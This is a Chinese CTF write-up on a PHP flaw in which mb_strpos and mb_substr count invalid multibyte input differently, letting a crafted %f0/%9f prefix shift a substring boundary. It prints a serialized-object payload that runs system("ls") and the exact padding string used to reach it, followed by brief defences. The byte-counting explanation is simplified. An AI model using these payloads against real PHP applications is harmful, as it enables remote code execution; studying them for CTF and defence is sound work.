字符编码处理漏洞：mb_strpos与mb_substr组合引发的字符逃逸<\/h1>

漏洞原理分析<\/h2>

1. 漏洞代码示例<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>highlight_file<\/span>(__FILE__<\/span>);
<\/span><\/span>error_reporting<\/span>(0<\/span>);
<\/span><\/span>
<\/span><\/span>function<\/span> substrstr<\/span>($data)
<\/span><\/span>{
<\/span><\/span>    $start =<\/span> mb_strpos<\/span>($data, "["<\/span>);
<\/span><\/span>    echo<\/span> $start.<\/span>'<br>'<\/span>;
<\/span><\/span>    $end =<\/span> mb_strpos<\/span>($data, "]"<\/span>);
<\/span><\/span>    echo<\/span> $end.<\/span>'<br>'<\/span>;
<\/span><\/span>    return<\/span> mb_substr<\/span>($data, $start +<\/span> 1<\/span>, $end -<\/span> 1<\/span> -<\/span> $start);
<\/span><\/span>} 
<\/span><\/span>
<\/span><\/span>$key =<\/span> substrstr<\/span>($_GET[0<\/span>].<\/span>"[welcome"<\/span>.<\/span>$_GET[1<\/span>].<\/span>"world"<\/span>);
<\/span><\/span>echo<\/span> $key;
<\/span><\/span><\/code><\/pre>2. 函数功能解析<\/h3>
该代码定义了一个自定义函数substrstr()<\/code>，其内部逻辑如下：<\/p>


定位边界字符<\/strong>：<\/p>

使用mb_strpos($data, "[")<\/code>查找左中括号[<\/code>的位置索引<\/li>
使用mb_strpos($data, "]")<\/code>查找右中括号]<\/code>的位置索引<\/li>
<\/ul>
<\/li>

字符串截取<\/strong>：<\/p>

使用mb_substr($data, $start + 1, $end - 1 - $start)<\/code>截取两个边界字符之间的内容<\/li>
<\/ul>
<\/li>

参数拼接<\/strong>：<\/p>

输入参数通过$_GET[0]."[welcome".$_GET[1]."world"<\/code>方式拼接<\/li>
最终形成完整的字符串进行处理<\/li>
<\/ul>
<\/li>
<\/ol>
字符编码差异导致的漏洞<\/h2>
核心问题：多字节字符处理不一致性<\/h3>
mb_strpos<\/code>和mb_substr<\/code>函数在处理多字节字符时存在计算差异：<\/p>

mb_strpos<\/strong>：按照实际字节数计算位置<\/li>
mb_substr<\/strong>：按照字符数计算位置<\/li>
<\/ul>
3. 漏洞触发机制<\/h3>
情况一：使用%9f<\/code>字符<\/h4>
测试输入<\/strong>：<\/p>

参数0：%9f<\/code><\/li>
参数1：1<\/code><\/li>
<\/ul>
处理过程<\/strong>：<\/p>

拼接后的字符串：%9f[welcome1world<\/code><\/li>
mb_strpos<\/code>将%9f<\/code>识别为1个字节，找到[<\/code>的位置索引为1<\/li>
mb_substr<\/code>将%9f<\/code>识别为1个字符，从位置2开始截取<\/li>
实际截取结果：welcome1wor<\/code><\/li>
<\/ol>
关键发现<\/strong>：<\/p>

%9f<\/code>导致字符串索引计算出现偏差<\/li>
mb_strpos<\/code>和mb_substr<\/code>对同一字符的字节计数不一致<\/li>
<\/ul>
情况二：使用%f0<\/code>字符<\/h4>
测试输入<\/strong>：<\/p>

参数0：%f0<\/code><\/li>
参数1：1<\/code><\/li>
<\/ul>
处理过程<\/strong>：<\/p>

拼接后的字符串：%f0[welcome1world<\/code><\/li>
mb_strpos<\/code>将%f0<\/code>识别为多个字节（具体取决于编码）<\/li>
产生更大的位置偏移，吃掉更多字符<\/li>
<\/ol>
4. 字节差异计算规则<\/h2>
通过实验得出以下规律：<\/p>



输入字符组合<\/th>
mb_strpos计数字节数<\/th>
mb_substr计数字符数<\/th>
相差字节数<\/th>
<\/tr>
<\/thead>


%f0abc<\/code><\/td>
4字节<\/td>
1字符<\/td>
3字节<\/td>
<\/tr>

%f0%9fab<\/code><\/td>
3字节<\/td>
1字符<\/td>
2字节<\/td>
<\/tr>

%f0%9f%9fa<\/code><\/td>
2字节<\/td>
1字符<\/td>
1字节<\/td>
<\/tr>
<\/tbody>
<\/table>
5. 实际漏洞利用案例<\/h2>
Base2024 ez_php题目分析<\/h3>
漏洞利用场景<\/strong>：<\/p>
\/\/ 题目关键代码
<\/span><\/span><\/span><\/span>$pre =<\/span> $_GET['substr'<\/span>];
<\/span><\/span>$ctf =<\/span> unserialize<\/span>($_POST['ctf'<\/span>]);
<\/span><\/span>echo<\/span> $pre.<\/span>"["<\/span>.<\/span>serialize<\/span>($ctf).<\/span>"]"<\/span>;
<\/span><\/span><\/code><\/pre>利用步骤<\/strong>：<\/p>

构造恶意序列化数据<\/strong>：<\/li>
<\/ol>
O<\/span>:<\/span>6<\/span>:<\/span>"Hacker"<\/span>:<\/span>3<\/span>:<\/span>{s<\/span>:<\/span>5<\/span>:<\/span>"start"<\/span>;s<\/span>:<\/span>216<\/span>:<\/span>"{{{'a:2:{i:1;O:6:"<\/span>Hacker<\/span>":3:{s:5:"<\/span>start<\/span>";O:1:"<\/span>C<\/span>":1:{s:1:"<\/span>c<\/span>";O:1:"<\/span>T<\/span>":1:{s:1:"<\/span>t<\/span>";O:1:"<\/span>F<\/span>":1:{s:1:"<\/span>f<\/span>";O:1:"<\/span>E<\/span>":1:{s:1:"<\/span>e<\/span>";O:1:"<\/span>R<\/span>":1:{s:1:"<\/span>r<\/span>";s:13:"<\/span>system<\/span>("ls"<\/span>);";}}}}}s:3:"<\/span>end<\/span>";s:6:"<\/span>hacker<\/span>";s:8:"<\/span>username<\/span>";R:9;}i:2;N;}'}}}"<\/span>;s<\/span>:<\/span>3<\/span>:<\/span>"end"<\/span>;N<\/span>;s<\/span>:<\/span>8<\/span>:<\/span>"username"<\/span>;s<\/span>:<\/span>6<\/span>:<\/span>"hacker"<\/span>;}
<\/span><\/span><\/code><\/pre>

计算需要吃掉的字符数<\/strong>：需要绕过38个字符<\/p>
<\/li>

构造payload<\/strong>：<\/p>
<\/li>
<\/ol>

使用12个%f0abc<\/code>：每个吃掉3字节 × 12 = 36字节<\/li>
使用1个%f0%9fab<\/code>：吃掉2字节<\/li>
总计：36 + 2 = 38字节<\/li>
<\/ul>
最终payload<\/strong>：<\/p>
%f0abc%f0abc%f0abc%f0abc%f0abc%f0abc%f0abc%f0abc%f0abc%f0abc%f0abc%f0abc%f0%9fab
<\/code><\/pre>
6. 防御措施<\/h2>

统一字符处理函数<\/strong>：确保在同一应用中使用一致的字符处理函数<\/li>
输入验证<\/strong>：对用户输入进行严格的字符编码验证<\/li>
长度检查<\/strong>：在处理前后进行字符串长度一致性验证<\/li>
编码声明<\/strong>：明确指定字符编码格式，避免自动检测带来的不确定性<\/li>
<\/ol>
7. 总结<\/h2>
该漏洞的核心在于多字节字符处理函数之间的不一致性，攻击者通过精心构造的多字节字符，利用mb_strpos<\/code>和mb_substr<\/code>对字符计数方式的差异，实现字符逃逸和边界绕过。在实际渗透测试中，这种漏洞常出现在字符串处理、序列化数据解析等场景中。<\/p>